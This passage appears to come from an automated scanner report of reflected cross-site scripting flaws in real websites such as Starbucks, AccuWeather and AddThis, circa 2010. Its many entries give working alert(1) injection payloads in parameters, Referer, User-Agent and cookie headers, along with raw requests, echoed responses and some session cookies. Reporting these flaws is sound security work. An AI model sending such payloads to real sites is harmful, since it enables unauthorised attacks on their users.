<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="https://www.starbucks.com/card/rewards/card-rewards-canada?26c4c"style="x:expression(alert(1))"4bdf545b85e=1"/> ...[SNIP]...
4.287. https://www.starbucks.com/card/rewards/program-information [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.starbucks.com
Path:
/card/rewards/program-information
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f8d6"style%3d"x%3aexpression(alert(1))"d5e731ac872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f8d6"style="x:expression(alert(1))"d5e731ac872 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /card/rewards/program-information?2f8d6"style%3d"x%3aexpression(alert(1))"d5e731ac872=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:42:24 GMT Connection: close Content-Length: 42802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="https://www.starbucks.com/card/rewards/program-information?2f8d6"style="x:expression(alert(1))"d5e731ac872=1"/> ...[SNIP]...
4.288. https://www.starbucks.com/card/starbucks-gold [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.starbucks.com
Path:
/card/starbucks-gold
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4be80"%20style%3dx%3aexpression(alert(1))%206a22aa5aef0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4be80" style=x:expression(alert(1)) 6a22aa5aef0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /card/starbucks-gold?4be80"%20style%3dx%3aexpression(alert(1))%206a22aa5aef0=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:42:39 GMT Connection: close Content-Length: 36385
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="https://www.starbucks.com/card/starbucks-gold?4be80" style=x:expression(alert(1)) 6a22aa5aef0=1"/> ...[SNIP]...
4.289. http://www.stltoday.com/blogzone/morning-skate/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.stltoday.com
Path:
/blogzone/morning-skate/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e50f1-->964848935ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blogzone/morning-skate/?e50f1-->964848935ee=1 HTTP/1.1 Host: www.stltoday.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.290. http://www.ucsc-extension.edu/programs/bioinformatics [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.ucsc-extension.edu
Path:
/programs/bioinformatics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea15f"><a>6f30bf8805a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /programs/bioinformatics?ea15f"><a>6f30bf8805a=1 HTTP/1.1 Host: www.ucsc-extension.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 07:50:44 GMT Server: Apache/2.2.11 (Win32) PHP/5.2.9 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Wed, 08 Dec 2010 07:50:44 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26741
4.291. http://www.ucsc-extension.edu/programs/biotechnology [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.ucsc-extension.edu
Path:
/programs/biotechnology
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70921"><a>a4370fc8d9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /programs/biotechnology?70921"><a>a4370fc8d9c=1 HTTP/1.1 Host: www.ucsc-extension.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 07:51:44 GMT Server: Apache/2.2.11 (Win32) PHP/5.2.9 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Wed, 08 Dec 2010 07:51:44 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26146
4.292. http://www.ucsc-extension.edu/programs/medical-devices [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.ucsc-extension.edu
Path:
/programs/medical-devices
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc147"><a>453003d89af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /programs/medical-devices?bc147"><a>453003d89af=1 HTTP/1.1 Host: www.ucsc-extension.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 07:51:20 GMT Server: Apache/2.2.11 (Win32) PHP/5.2.9 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Wed, 08 Dec 2010 07:51:20 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23208
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2de55"><script>alert(1)</script>7a8f70f760d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /lab/innerfade/ HTTP/1.1 Host: medienfreunde.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 2de55"><script>alert(1)</script>7a8f70f760d
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:05:36 GMT Server: Apache X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 14722
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de"> <!-- saved from url=(0013)about:internet --> <hea ...[SNIP]... <iframe src="http://pingomatic.com/ping/?title=Gestaltung&blogurl=2de55"><script>alert(1)</script>7a8f70f760d&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 111ff<script>alert(1)</script>2b227afd836 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... <br> The exception [no protocol: 111ff<script>alert(1)</script>2b227afd836] was caught at: <br> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 542d3"-alert(1)-"7f554e65bd4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... <a class='registerLink' href=" + MNGiRegistrationLoginUrl + "?url=http://www.google.com/search?hl=en&q=542d3"-alert(1)-"7f554e65bd4®ister=yes> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fc78'-alert(1)-'2d186abb80a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9fc78'-alert(1)-'2d186abb80a
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 08 Dec 2010 01:26:12 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3686 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D9fc78%27%2Dalert%281%29%2D%272d186abb80a; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDSQDRBASS=IPFCIJICJNEBJPECEFHNFLOE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f4e4"-alert(1)-"80fdf312bed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index-radar.asp HTTP/1.1 Host: www.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2f4e4"-alert(1)-"80fdf312bed
Response (redirected)
HTTP/1.1 200 OK Cache-Control: public Content-Length: 66751 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Date: Wed, 08 Dec 2010 01:31:47 GMT Connection: close Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Fri, 07-Jan-2011 00:00:00 GMT; path=/ Set-Cookie: aco=dbg=0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea ...[SNIP]... nterest = "health"; var selInterestSub = "aches-pains"; var hurrBasin = ""; var hurrStorm = "";
var adc_partner = 'accuweather'; var agiPageRef = "http://www.google.com/search?hl=en&q=2f4e4"-alert(1)-"80fdf312bed";
var adGoogleFile = 'forecast'; var adGoogleTraveler = "0"; var adGoogleInsertLinks = false; var adGoogleLinksHTML = '';
var adWeaIconDay1 = ""; var adWeaIconCurr = ""; var ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd582"-alert(1)-"580f3a21662 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /maps-satellite.asp HTTP/1.1 Host: www.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bd582"-alert(1)-"580f3a21662
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Length: 65978 Content-Type: text/html Cache-Control: public Date: Wed, 08 Dec 2010 01:31:12 GMT Connection: close Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Fri, 07-Jan-2011 00:00:00 GMT; path=/ Set-Cookie: aco=dbg=0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... nterest = "health"; var selInterestSub = "aches-pains"; var hurrBasin = ""; var hurrStorm = "";
var adc_partner = 'accuweather'; var agiPageRef = "http://www.google.com/search?hl=en&q=bd582"-alert(1)-"580f3a21662";
var adGoogleFile = ''; var adGoogleTraveler = "0"; var adGoogleInsertLinks = false; var adGoogleLinksHTML = '';
var adWeaIconDay1 = ""; var adWeaIconCurr = ""; var adHTemp ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83e95"><script>alert(1)</script>37abf567123 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=83e95"><script>alert(1)</script>37abf567123
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:30:50 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 87947
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=83e95"><script>alert(1)</script>37abf567123" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e2e62<script>alert(1)</script>b87e9505e3f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e2e62<script>alert(1)</script>b87e9505e3f
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:30:51 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 87933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>e2e62<script>alert(1)</script>b87e9505e3f - Google search</h4> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbf30"><script>alert(1)</script>869f99d7ee2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)dbf30"><script>alert(1)</script>869f99d7ee2 Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=lrut15yo2hhcicrjpzcpovph; path=/; HttpOnly X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 01:31:28 GMT Connection: close Content-Length: 69450
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... <input type="hidden" name="__USERAGENT" id="__USERAGENT" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)dbf30"><script>alert(1)</script>869f99d7ee2" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b3b0'-alert(1)-'127eac430ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.protopage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 2b3b0'-alert(1)-'127eac430ed
<!-- Copyright 2004-2008 Protopage Ltd. All rights reserved. --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Pro ...[SNIP]... ":1,"tag":"YP"},{"count":1,"tag":".........."}]); var feedHistory = new Object(); var pageParams = new Object(); pageParams['currentPagePath'] = 'protopage/autocreate'; pageParams['autoAddFeedUrl'] = '2b3b0'-alert(1)-'127eac430ed'; pageParams['pagePathAttempted'] = 'protopage/autocreate'; var categories = [{ "id": 1, "virtualPages": [], "sharing": {"type": "public"}, "label": "My public category", "schemeOffset": " ...[SNIP]...
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8422"-alert(1)-"d14b138d089 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4453"-alert(1)-"9e9f00070e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4a15"-alert(1)-"4c6ffee1842 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload b3de5<script>alert(1)</script>f8789a7faf3 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
